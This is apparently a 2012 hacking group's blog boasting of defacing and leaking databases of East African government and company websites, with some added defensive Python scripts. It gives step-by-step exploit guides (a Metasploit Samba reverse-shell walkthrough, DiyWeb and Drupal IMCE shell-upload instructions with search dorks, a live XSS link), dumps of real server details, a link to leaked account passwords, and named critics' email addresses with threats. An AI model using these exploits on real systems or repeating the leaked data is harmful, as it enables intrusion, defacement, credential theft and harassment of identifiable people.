Saturday, September 15, 2012

Extracting MetaData from photos using exiftool

                                              Hello Rwandans !!!!!

In this post I will show you how to extract metadata from photos to see exactly where a photo was taken.


Also note that this method is used to solve many "crimes": by conducting a forensic analysis of an image, you can get the REAL data, such as the EXACT date and time, the location, the name of the camera, the modification date if the image was edited, and all the other fields stored in it,
which leads to tangible results.

The tool is located in the menu structure under Digital Forensics, or through:

Applications - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

The image I used is called fotografia.jpg and is in the images folder.

The path is as follows: ~/images/fotografia.jpg

The command is: ./exiftool -a ~/images/fotografia.jpg
You can see a lot of data, such as the date and time the image was taken and everything else I mentioned above, and also that the photo was taken with a SAMSUNG.


In this case, we want to know where the photo was taken, so we copy the GPS data, which are:

GPS Latitude: 42 deg 24' 54.91" N
GPS Longitude: 83 deg 25' 21.36" W
GPS: 42° 24' 54.91" N, 83° 25' 21.36" W


As we can see, this photo was taken at Laurel Park Dr Livonia, MI 48152, USA
A cool thing to do is take pictures of Facebook and use this method to find GPS coordinates.
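The same reading can be automated to audit your own photos for location tags before you publish them. This is an added example, not part of the original post: the function names are hypothetical and the sample output is constructed around the two GPS values quoted above.

```python
import re

# Constructed sample of exiftool's text output (not taken from a real file);
# the two GPS values are the ones quoted in the post.
SAMPLE_OUTPUT = """\
File Name                       : fotografia.jpg
Make                            : SAMSUNG
GPS Latitude                    : 42 deg 24' 54.91" N
GPS Longitude                   : 83 deg 25' 21.36" W
"""

# Degrees, minutes, seconds and hemisphere; accepts "deg" or the degree sign.
DMS_RE = re.compile(
    r"""(\d+(?:\.\d+)?)\s*(?:deg|°)\s*   # degrees
        (\d+(?:\.\d+)?)\s*'\s*           # minutes
        (\d+(?:\.\d+)?)\s*"\s*           # seconds
        ([NSEW])""",
    re.VERBOSE,
)


def dms_to_decimal(value):
    """Convert an exiftool DMS string to signed decimal degrees."""
    m = DMS_RE.search(value)
    if m is None:
        raise ValueError("not a DMS coordinate: %r" % value)
    deg, minutes, seconds = (float(x) for x in m.group(1, 2, 3))
    if minutes >= 60 or seconds >= 60:
        raise ValueError("minutes/seconds out of range: %r" % value)
    decimal = deg + minutes / 60 + seconds / 3600
    if decimal > (90 if m.group(4) in "NS" else 180):
        raise ValueError("coordinate out of range: %r" % value)
    # South and West are negative in decimal notation.
    return round(-decimal if m.group(4) in "SW" else decimal, 6)


def parse_tags(output):
    """Map tag name -> value; with -a duplicates can occur, the first one wins."""
    tags = {}
    for line in output.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            tags.setdefault(name.strip(), value.strip())
    return tags


def location_report(output):
    """List the GPS tags present and, if both axes exist, the decimal position."""
    gps = {k: v for k, v in parse_tags(output).items() if k.startswith("GPS")}
    position = None
    if "GPS Latitude" in gps and "GPS Longitude" in gps:
        position = (dms_to_decimal(gps["GPS Latitude"]),
                    dms_to_decimal(gps["GPS Longitude"]))
    return {"gps_tags": sorted(gps), "position": position}


if __name__ == "__main__":
    print(location_report(SAMPLE_OUTPUT))
```

If the report lists any GPS tags on a photo you are about to share, `exiftool -gps:all= file.jpg` removes them.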


Enjoy

                                                          RWANDAN HACKERS


Exploiting Samba Server On Backtrack 5



Aim
- The main aim of this tutorial is to exploit the Samba server.
Identifying Samba Services
To identify Samba services running on the remote system we use nmap.
Command Used : nmap -sV 192.168.118.138
After scanning, it shows that ports 139 and 445 are used by Samba services.
See the below image for more details -



Msfconsole
Open msfconsole through a terminal.
Command Used : msfconsole
After entering the command, 'msfconsole' will open as shown below

Search Samba Exploit
To search for Samba exploits, enter the command given below -
Command Used to search samba exploit : search samba
When you press the Enter key, it shows the different exploits related to Samba.
From the exploits, select the one which is highlighted in the below image -
See the below image for more help

Use Exploit
Exploit Used : use exploit/multi/samba/usermap_script
See the below image for more details



Show Options
Command Used : show options
This command shows that RHOST is not set . So the next step is to set the Remote Host .
See the below image for more details


Set RHOST
Command Used : set RHOST <Remote IP Address>
See the below image for more details



Payload
Command Used : show payloads
See the below image and set the highlighted payload.





Set Payload
Command Used : set payload cmd/unix/reverse


Show Options
Command Used : show options
Now set the LHOST (local host address)




Set LHOST
Command Used : set LHOST <Your IP Address>



Set LPORT
Command Used : set LPORT 445





Commands Used
After getting a session, you can use commands as shown below -
See the below image -







Monday, September 3, 2012

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website



The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo.

The hackers, one of whom identified himself as Jeannot Kabuya, posted a string of statements written in French and calling for an end to the violence in DR Congo.

Some of the messages posted on the site, www.agriculture.go.ug, say Congo is not for sale.

The hackers also posted a string of pictures labeling the two presidents as well as Congolese rebel leader Bosco Ntaganda as killers who are wanted for war crimes. Ntaganda has been heading the M23 rebels who in April this year launched a rebellion against the Joseph Kabila government.

Other messages posted on the site say the hackers are anonymous, they do not forgive and they do not forget.

Connie Achayo, the agriculture ministry spokesperson, says that they have decided to pull down the website as they investigate the origin of the messages and the possible motive of the hackers.

Fred Opolot, the director at the Uganda Media Centre, says he is aware of the move by hackers but is getting in touch with the public relations officer at the ministry of agriculture to pull down the site.

Earlier, Information minister Mary Karooro Okurut said she was not aware of the development but was getting in touch with the ministry officials to furnish her with details.

President Kagame of Rwanda and Kabila of DR Congo are expected to meet Museveni in Kampala on Tuesday this week to try and ease tension in the region. Congo accuses Rwanda of supporting the M23 rebels, a claim Rwanda dismisses.

On February 29th this year, the website of the Ministry of Works was briefly pulled down after a hacker posted a picture of FDC leader Kizza Besigye seated on a stool in a pensive mood. The image stayed on the site for several hours until the website was pulled down at about 5pm.

In May 2010, a hacker going by name Kaka Argentine posted a photo of Adolf Hitler with a Nazi party symbol on his chest on the State House website. In 2010, hackers calling themselves “the Ayyildiz team” posted pro-Palestine items on the website of the Ministry of Defence, accusing Israel of killing innocent Palestinians.

Thursday, August 30, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit


Exploit title : DiyWeb Admin Bypass and file Upload exploit
Discovered By : NoentryPhc
Server : windows
Type : web application
Shell extension : .asp

Dork : "Power by DiyWeb"
            inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
Almost all websites vulnerable to this exploit are Malaysian.
To upload your files go to : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
If the .php extension is not allowed then you can try Tamper Data and Live HTTP Headers.
To access your file go to : http://www.website.com/Images/yourfilehere and sometimes you have to find your file manually on the website
Link:http://www.famosapadu.com.my/images/index.html

Google website vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

We discovered a cross-site scripting (XSS)
vulnerability in a Google website. We already reported the vulnerability to the Google security experts.

Wednesday, August 29, 2012

Biochemistry - Makerere University website HACKED !!!

 Link:http://biochemistry.mak.ac.ug/start/index.php
Makerere University Department Of Biochemistry hacked by Rwandan Hackers
Dedications to "UGANDAN HACKERS"

                                                            ADMIN PANEL
       

Saturday, August 18, 2012

National Oil Corporation of Kenya Defaced by Rwandan hackers


HACKED LINK:http://www.nockenya.co.ke/images/hacked.html


National Oil is state corporation under the Ministry of Energy incorporated in April 1981 and charged with participation in all aspects of the petroleum industry. National Oil has a 100% Government of Kenya shareholding.
National Oil became operational in 1984 and its initial operations were limited to exploration activities delegated from the Ministry of Energy. In 1988, National Oil went downstream and actively started participating in the importation and sale of petroleum products including crude oil, white fuels, lubricants and LPG.
The formation of National Oil was precipitated by the oil crisis of the 1970's(1973/74 and 1979/80) and the correspondent supply disruptions and price hikes which resulted in the country's oil bill comprising of almost one third of the total value of imports and therefore making petroleum the largest single drain of Kenya's foreign exchange earnings.
National Oil was therefore born out a need by the Government of Kenya to have greater control of the petroleum sector which is a crucial determinant of the country’s economic performance. National Oil has since remained the Government’s policy instrument in matters related to oil specifically in the upstream exploration of oil and gas, mid-stream development of petroleum infrastructure and downstream marketing of petroleum products including motor and industrial fuels, lubricants, LPG and related motor consumables and hardware.

                                                       WE ARE BACK KENYA !!!

Sunday, August 12, 2012

Orinfor.gov.rw hacked #database Leaked


VULNERABILITY DESCRIPTION:

Apache httpd Remote Denial of Service
Vulnerability description
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tool has been observed. The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


This alert was generated using only banner information.

Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).

This vulnerability affects Web Server.
Discovered by: Scripting (Version_Check.script).
Attack details
Current version is : 2.2.8
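The banner-only version check this alert relies on, next to a server-side check for the overlapping ranges it describes, as an added example (not the scanner's code). The function names, the MAX_RANGES threshold, the 1000-byte body size and the sample requests are assumptions constructed for illustration.

```python
import re

MAX_RANGES = 5  # assumed threshold for this example; tune to your own traffic

# Constructed (client, Range header) samples using documentation addresses.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "bytes=0-499"),
    ("192.0.2.20", "bytes=0-100,50-150,20-80"),
    ("192.0.2.30", "bytes=0-99,200-299"),
]


def banner_is_affected(banner):
    """Apply the affected branches listed in the alert; None if no version shown."""
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", banner)
    if m is None:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor) == (1, 3):
        return True
    if (major, minor) == (2, 0):
        return patch <= 64
    if (major, minor) == (2, 2):
        return patch <= 19
    return False  # a banner cannot show distribution backports either way


def parse_ranges(header, length):
    """Resolve a Range header into (start, end) pairs for a body of `length` bytes."""
    unit, _, spec = header.partition("=")
    if unit.strip().lower() != "bytes":
        return []
    ranges = []
    for part in spec.split(","):
        m = re.fullmatch(r"\s*(\d*)-(\d*)\s*", part)
        if m is None or m.group(1) == m.group(2) == "":
            continue
        first, last = m.groups()
        if first == "":  # suffix form "-N": the last N bytes
            start, end = max(length - int(last), 0), length - 1
        else:
            start = int(first)
            end = min(int(last), length - 1) if last else length - 1
        if start <= end:
            ranges.append((start, end))
    return ranges


def overlap_count(ranges):
    """Number of ranges that overlap a range starting earlier."""
    count, furthest = 0, -1
    for start, end in sorted(ranges):
        if start <= furthest:
            count += 1
        furthest = max(furthest, end)
    return count


def is_suspicious(header, length):
    ranges = parse_ranges(header, length)
    return len(ranges) > MAX_RANGES or overlap_count(ranges) > 0


def flag_requests(requests, length=1000):
    """Return the clients whose Range header should be rejected or logged."""
    return [client for client, header in requests if is_suspicious(header, length)]


if __name__ == "__main__":
    print(banner_is_affected("Apache/2.2.8 (Ubuntu)"), flag_requests(SAMPLE_REQUESTS))
```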

Some messages and IP addresses from orinfor
SERVER INFO:
Target:http://www.orinfor.gov.rw/
Host IP:41.74.172.227
Web Server:Apache/2.2.8 (Ubuntu)
DB Server:MySQL
Resp. Time(avg):1406 ms
Current User:datareader@localhost
Sql Version:5.0.96-0ubuntu3
Current DB:orinfordb
System User:datareader@localhost
Host Name:orinfor-webbackup
Installation dir:/usr/
Data Bases: information_schema
   mysql
   orinfordb


ADMIN PASSWORD 

Table:orinfor_users
Total Rows:5




Saturday, August 4, 2012

Rwandan diaspora website hacked by Rwandan Hackers #GOV.RW

Rwandan diaspora website has been hacked by Rwandan Hackers
Link:http://jobs.rwandandiaspora.gov.rw/cv/34testRwandanhackers.txt


Vulnerability description
Manual confirmation is required for this alert.


This page is using a weak password. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes.
Affected items
/profileloginconfirm.php 
The impact of this vulnerability
An attacker may access the contents of the password-protected page.


How to fix this vulnerability
Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words.



Igihe website infected with malware



It seems that the site igihe.com was infected by a Russian hacker,
because igihe.com was redirected to a website hosted in Russia: http://ilulxak.ru / http://nycaqsy.ru.


We wrote an article on vulnerabilities found in igihe.com website some days ago
http://rwandan-hackers.blogspot.fr/2012/07/igihecom-vulnerable-to-xss.html

I think the hacker used this exploit

http://www.exploit-db.com/exploits/9448/ [SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit]

https://badwarebusters.org/main/itemview/7997 [more advice Here ]


I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.

First of all, check the administrative PC for malware, use multiple AV and Malware scanners to check and remove any found.

Change the password of the FTP, preferably from an alternate PC.

Do NOT store the password in your FTP client.

Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz infection or a variant thereof, so you will likely find iframes or malicious scripts embedded in the various files of your site. Check both normal html/php files and script files.

When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.

Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035

Google webmaster tools:
http://www.google.com/webmasters/tools/

Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://igihe.com
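A sweep for the two artifacts named in the cleanup steps above (.htaccess redirects, including those conditioned on the referrer or user agent, and hidden iframes or external scripts in site files), as an added example that is not part of the original post. The regexes, the own_hosts allowlist and the sample files are constructed assumptions; point scan_webroot at the folder above the site root to cover the .htaccess files there too.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

CONTENT_EXT = (".html", ".htm", ".php", ".js")
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_(?:REFERER|USER_AGENT)\}", re.I)
REDIRECT = re.compile(r"^\s*(?:RewriteRule|Redirect(?:Match)?)\b.*?(https?://\S+)", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*" + SRC.pattern, re.I)
HIDDEN = re.compile(r"(?:width|height)\s*[=:]\s*[\"']?[01](?:px)?\b"
                    r"|display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def is_external(url, own_hosts):
    """True when the URL's host is neither one of our hosts nor a subdomain."""
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and not any(host == h or host.endswith("." + h) for h in own_hosts)


def scan_file(path, own_hosts):
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    if os.path.basename(path) == ".htaccess":
        conditional = False
        for line in text.splitlines():
            if COND.match(line):
                conditional = True  # the next rule only fires for some visitors
            m = REDIRECT.match(line)
            if m and is_external(m.group(1), own_hosts):
                kind = "referer/agent-conditional redirect" if conditional else "redirect"
                findings.append((kind, m.group(1)))
                conditional = False
    elif path.lower().endswith(CONTENT_EXT):
        for tag in IFRAME.findall(text):
            src = SRC.search(tag)
            if src and is_external(src.group(1), own_hosts) and HIDDEN.search(tag):
                findings.append(("hidden external iframe", src.group(1)))
        for url in SCRIPT_SRC.findall(text):
            if is_external(url, own_hosts):
                findings.append(("external script", url))
    return findings


def scan_webroot(root, own_hosts):
    """Walk every folder under root; return {relative path: [(kind, url), ...]}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            hits = scan_file(path, own_hosts)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


def demo():
    """Build a constructed sample site in a temporary folder and scan it."""
    samples = {
        ".htaccess": "RewriteEngine On\nRewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]\n"
                     "RewriteRule .* http://redirect.example.net/in.php [R=302,L]\n",
        "index.php": '<body>Home<iframe src="http://frames.example.net/x" width="1" height="1"></iframe></body>',
        "js/menu.js": "document.write('<script src=\"http://cdn.example.org/lib.js\"></script>');",
        "about.html": '<iframe src="http://www.example.com/map" width="400" height="300"></iframe>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root, own_hosts={"example.com", "cdn.example.org"})
```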

The website is under construction

update at 00:12 August 4, 2012:

I saw that they copied this article to explain the nature of the virus.
Next time do your work and stop copying our work.


Sunday, July 29, 2012

www.goviago.com Pown3d By Rwandan Hackers

ADMIN PANEL 
 Goviago hacked by Rwandan Hackers

Go Ltd is a new technological lighted splint raised in 2011; and registered by RDB as a legal IT company. It is new but with excellent performance. GO Ltd has a target of empowering creativity and innovation in technology in Rwanda.
The company is now owned by three entrepreneurs:
SHIKAMA Dioscore, Founder and CEO
MANISHIMWE Alexis, Founder and Human Resources Officer(HRO)
NIYIKIZA Aimable, Co-founder and Technical Director.

Our team is composed of, among others;
1. Eng.RURANGWA Thadée, Assistant Technical Director
2. Eng.Rusa Richard, Head of DDGD (Department of Developers and Graphic Designers)
3. Eng.Niyigena Diogène, Head of DETE(Department of electronics and Telecommunication engineers)
4. HITIMANA N. Emmanuel, Media Analyst

SERVER INFO:
Target:http://www.goviago.com/
Host IP:50.116.99.167
Web Server:Apache
DB Server:MySQL >=5
Resp. Time(avg):517 ms
Current User:goltd@localhost
Sql Version:5.5.23-55
Current DB:goltd_govi
System User:goltd@localhost
Host Name:gator1873.hostgator.com
Installation dir:/usr
DB User: goltd'@'localhost'
Data Bases:information_schema
         goltd_govi


                           MESSAGE TO ADMIN: PLEASE CHANGE THE PASSWORD !!!
Admin Username and Password

Saturday, July 28, 2012

WestFm kenya and twendetwende.co.ke Hacked #Dedication to "Kenyan cyber security expert"


westfm kenya and twendetwende.co.ke have been hacked by Rwandan Hackers
twendetwende link:http://www.twendetwende.co.ke/hotel.php?id=12


West Fm is an independent commercial radio station that is fast growing and a favorite to the population of Western Kenya, North Rift and Eastern Uganda. The station started broadcasting in July 2006. Rating reports from Steadman justify that, the station has rapidly captured the imagination of the people within the region and stands in a league of its own.

West Fm offers comprehensive programs. We focus on issues that affect the region thus; we speak to the community directly as well as giving them a platform to tackle issues affecting their daily lives on radio. As the Region’s fast growing and favorite radio station, West Fm 94.9 & 104.1 will give your products a significant exposure during prime listening times on an exclusive basis.


http://www.twendetwende.co.ke/hotel.php?id=12

Wednesday, July 25, 2012

Drupal IMCE Mkdir remote deface upload exploit by Rwandan Hackers


IMCE Mkdir is a remote file upload vulnerability on the Drupal platform.
Normally you can upload .txt extensions on websites,
but some sites allow you to upload .html files.
If you want to upload a shell on a website then try the .phtml extension.

Google Dork : inurl:"/imce?dir=" intitle:"File Browser"
                      http://www.website.com/abc/files/abc/yourfilehere

First of all, find a vulnerable website using the Google dork.
After opening the site go to http://website.com/imce?dir=
and the file upload option is there.




To access your shell/deface/file go here
http://www.website.com/abc/files/abc/yourfilehere
(replace abc with directory of website)
My deface page  :http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/rwandanhackers.html


Leave comment if any query :) stay connected for More !

Sunday, July 22, 2012

National Environment Management Authority Hacked #little message to "kenyan cyber security expert"

National Environment Management Authority hacked 
The database was leaked in a pastebin note

Little message to "kenyan cyber security expert":

This post is dedicated to:

BRIGHT GAMELI 
brightzeed@gmail.com



Gichuki John Chuksjonia
chuksjonia@gmail.com 


Fredrick Wahome
frewah85@gmail.com 

Dennis Kioko
 dmbuvi@gmail.com 

and others I forgot to mention
My message is that:

You spend your time criticizing us that we are "script kiddies",
yes I assume I am one and ,I want to say that the Rwanda can have hackers because 
you said that "it's kenyan hackers"behind a mask of "RWANDAN HACKERS",
I want to say that unfortunately I am Rwandese and i'm proud to be RWANDAN.
Because of  you I am going to rot the Kenyan websites ;)
Thank you to you for your encouragement
next time I'll rot your lives men :)

WE ARE RWANDAN HACKERS 


My internet speed



Friday, July 20, 2012

www.future.co.ug Pown3d !!!

Link:http://www.future.co.ug/newsevents.php
ABOUT US:
"Future Technologies Limited is the leading provider of computer education in Uganda. In order to achieve our objective of providing quality higher education, we have made unique partnerships and strategic alliances with the global leaders in the IT education field.

Our alliance partnership with Aptech Worldwide brings a unique delivery of IT career courses that fully equips students to gain complete confidence to meet any challenges in IT industry. Aptech Uganda, where more than 9,000 students have been trained is among the premier Aptech centers across the world. Aptech is acclaimed as the leading IT training institution in the world with a network spreading across 54 countries, connecting over 3,200 locations, providing a wide range of educational programs.

Future Technologies is one of the largest Microsoft Certified Competency Learning Centers in the region. This is the highest level of accreditation provided to Microsoft Partners who have demonstrated the highest level of expertise in I.T. skill delivery and have world-class infrastructure. Courses are delivered in its original form, and students get the Microsoft Official Curriculum kits and the course participation certificates from Microsoft.

Our association with Oracle University as the Oracle Approved Education Partner makes us authorized to conduct training using the official curriculum of Oracle University. Oracle University accredited institutions are the only ones authorized to conduct Oracle training using the official curriculum from the Oracle University, designed by Oracle to deliver the training in original technology and style.

Our association with CompTIA (Computer Technology Industry Association) as the CompTIA Learning Alliance Partner enables us to deliver platform independent technology learning. CompTIA is the largest developer of vendor neutral IT Certification Courses in the world.

Future Technologies houses an Authorized Prometric Testing Centre (APTC) enabling students and professionals to appear in online testing for certification process by various vendors.

Our Enterprise Training and Solutions (ETS) division offers software development and implementation services and corporate training.
Our association with Arena Multimedia, the Asia’s leader in Multimedia education, enables us to deliver various multi-media courses in the region.

All the above alliances and tie-ups make us the unique player in the IT industry in the region."

to enter in the control panel I haven't needed a password  ;)

Thursday, July 19, 2012

Energy Regulatory Commision Kenya Hacked !!!!! #OPKENYA


To start, we aren't Kenyan hackers hiding behind the mask "Rwandan hackers".
We are Rwandan Hackers and we are Rwandese, we love Rwanda.

After Kenya Broadcasting Corporation"www.kbc.co.ke"
I thought why not a government website??
and I chose this one www.erc.go.ke
Admin Panel




it's just the beginning for security expert from kenya  #
WE LOVE RWANDA

Monday, July 9, 2012

Kenya Broadcasting Corporation Database Leaked #OPKENYAMEDIA


To start, we aren't Kenyan hackers hiding behind the mask "Rwandan hackers".
We are Rwandan Hackers and we are Rwandese, we love Rwanda.

Kenya Broadcasting Corporation "www.kbc.co.ke" Hacked by Rwandan Hackers [RWH]
The database has been hacked and exposed by Rwandan hackers.
About 2934 accounts, emails and passwords were leaked, and all the passwords are in clear text (not encrypted); server details were leaked as well.
DATABASE LINK:http://pastebin.com/5hN3Y9Nk


MEMBERS DETAIL

www.hortinews.co.ke Owned !!!!!! #OPkenyamedia

Horticultural News has been hacked by Rwandan hackers
LINK HACKED:http://www.hortinews.co.ke/article.php?id=447
ADMIN PANEL:
#OPKENYAMEDIA START ;)